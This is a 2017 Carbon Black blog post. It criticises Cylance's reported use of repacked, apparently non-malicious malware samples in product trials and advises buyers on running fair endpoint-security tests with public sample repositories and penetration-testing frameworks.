Cb Connect 2018 | Power of You | Register Now


Cylance and Questionable Ethics in Security Product Testing

Rick McElroy
April 18, 2017 / Michael Viscuso , Rick McElroy

There’s been a lot of talk recently about security product testing. Testing best practices, methodology, biases, accuracy, and even ethics have come under fire.

The stakes have never been higher in cybersecurity. Our financial information, healthcare records, personal devices and even democracy are at risk and under attack. Cybersecurity vendors have a responsibility to keep customers safe and should be held to the highest standards when it comes to product efficacy and transparency with customers.

A recent piece from Ars Technica’s Sean Gallagher reveals where one vendor, Cylance, may have fallen short on being completely transparent with prospective customers by reportedly providing malware sample sets that “weren’t malware at all.”

Among some of the key points of the piece:

“A systems engineer at a large company was evaluating security software products when he discovered something suspicious. One of the vendors [Cylance] had provided a set of malware samples to test—48 files in an archive stored in the vendor’s Box cloud storage account…Curious, the engineer took a closer look at the files in question—and found that seven weren’t malware at all.

“That led the engineer to believe Cylance was using the test to close the sale by providing files that other products wouldn’t detect—that is, bogus malware only Protect would catch.”

“The case against Cylance turns on the practice of “re-packing” existing malware samples—essentially turning them into “fresh” malware. Rather than passing prospective customers raw malware samples to test, Cylance first alters the files using software utilities commonly referred to as “packers.” Packers convert executable files into self-extracting archives or otherwise obscure their executable code.”

“The files that only Cylance caught in the test were all repacked in some way; five of the files were processed with MPRESS and the remainder were packed with other tools, including what appears to be a custom packer.”

“Of the nine files in question, testing by the customer, by Ars, and by other independent researchers showed that only two actually contained malware.”

We’ll be the first to say that testing is a hard problem to solve. Just as there is no “silver bullet” security solution, there is no “one-size-fits-all” test to universally determine the “winning” product. As a buyer, a keen eye is required. It is critical for today’s buyers to consider both the source of the test and the standards the product is measured against.

We believe there needs to be a paradigm shift in how tests measure efficacy. Until that shift occurs, we’d like to help you do two things:

  1. Understand how to weed out security tests that might be biased.
  2. Outline two key, additional criteria, beyond preventing attacks, you should consider when evaluating endpoint security products.

Unbiased Testing

There are a few simple guidelines you can follow to ensure the integrity of a security product test.

Be a Skeptic. Be wary of testing advice from vendors. That’s right. We’re a vendor, and we recommend you proceed with caution when taking testing advice from vendors. Lean on vendors and ask WHY they are making a particular recommendation. Most importantly, determine if the recommendation maps accurately to your organization’s specific requirements.

Malware Samples Provided by a Vendor Aren’t Always Legitimate. This goes back to point one: Be a skeptic. Samples that come from a vendor are sometimes manipulated to favor their product over others. In the worst-case scenarios (which we’ve seen) the samples are non-functional or not even malicious. If you get samples from a vendor, ask them for fewer samples and lean on the vendor tell you what’s malicious about them. (If you aren’t sure how to verify the samples, see our “visibility” recommendations below.)

If you don’t want to use malware samples from vendors, use public sandboxes and analysis blogs, such as hybrid-analysis.com, virusshare.com, malshare.com and malware-traffic-analysis.net. These sites have repositories of authentic malware and can provide a deep technical analysis so you know how the malware should function. Focus on quality samples that demonstrate attacks you’re interested in. Quantity is not a good indicator of sample set quality or relevance.

Go Beyond Samples and Test How the Product Handles Real World Attacks. Malware samples alone are going to demonstrate one thing – how well the product can stop the particular malware samples in your sample set. You’re interested in stopping attacks, not just malware. Real world attackers don’t rely on packed executables. They use documents, PowerShell, Python, Java, built in OS tools, ANYTHING they can leverage to get the job done. To test the solution against real-world attack techniques use a penetration testing framework such as Metasploit. Construct payloads with Veil-Evasion and use the techniques seen in real attacks. PowerShell Empire is also a great way to build PowerShell command lines and macro-enabled documents that go beyond executable malware samples. Also, turn prevention off and watch what the samples do. If you can’t see what the samples do when prevention is turned off, what will you do when a sample gets through in the real world?

Other Criteria to Evaluate

  1. How well the product fits in with the your existing people, processes and technologies.
  2. The product’s ability to reduce attacker dwell time in your environment.

The Most Effective Security Product is the One Your Team Actually Uses. Product A might have a score of 98% while Product B might have a score of 95%.The apparent choice is Product A, right? Not necessarily. A 3% delta suggests there’s a difference between the products but this difference is so minor, it could be the exact opposite the very next test. Don’t make this difference the deciding factor. You want to deploy a product that’s usable by your team and fits into your existing security stack. Even if that’s Product B in this scenario, you’ve made the “better” decision.

Don’t be ashamed to pick the product that makes the most sense to your team or fills a gap in your tech stack. The independent testing authorities try to test efficacy. Only you can test applicability. If the product becomes shelfware, it’s wasting money and not doing anything to make you safer.

Visibility, Detection, and Response to Reduce Dwell Time in Your Environment. We can’t emphasize this point enough. Endpoint security products should prevent, detect, and help you respond to breach scenarios. They should be tested that way as well. There’s much more to stopping today’s attacks and empowering your team than “blocking X-thousand malware samples.”

Every prevention approach is liable to fail at some point. When it does, how will you know? Your security solution should give you information you can act on, beyond a simple malware block. When testing the solution, think about how it can be used in actual defensive scenarios when the attacker has succeeded. Does it make your life easier as a responder? Does it provide you with the visibility you need to determine the scope and impact? Does it offer insight into the tools, techniques and procedures your real-world adversaries are using?

To see the product’s visibility, detection, and response features, don’t just rely on finding a way around the prevention – turn the prevention off. If your team doesn’t find value when the prevention is off, it isn’t a good product.


We realize there is a certain sense of conflict in this post. “Here we go again. Another vendor is telling me how I need to test.” We understand where you are coming from. And while we want to “win” in this highly competitive endpoint security market, what we want more is for your organization to be more resilient against cyberattacks.

That resilience starts with shifting our perspective on testing efficacy. Until that paradigm shift becomes a reality, we want you to best leverage the existing system to find the right answers for your organization.

Stopping malware should be only one facet of protecting your organization from modern attacks. We need to starting testing against how we are attacked and, until the majority of independent tests reflect this shift, the burden of responsibility is largely on you, the buyer, to ensure vendors are testing real-world attacks ethically and without bias.

Ask the hard questions, demand more, and don’t settle. You should have the right security solution for your organization. Anything less is a waste of money and resources.


This blog post is meant to start the discussion; it’s by no means an exhaustive list of testing best practices. We’d like to be leaders in this discussion and listening to your input is critical. If you’d like to continue this discussion with us, find us on Twitter @MichaelViscuso and @InfoSecRick


To learn how to defend your organization from non-malware attacks, join us at the upcoming webinar: “Beyond AV Webinar: Cb Defense in 20 Minutes.”

TAGS: Carbon Black / ethics / security product testing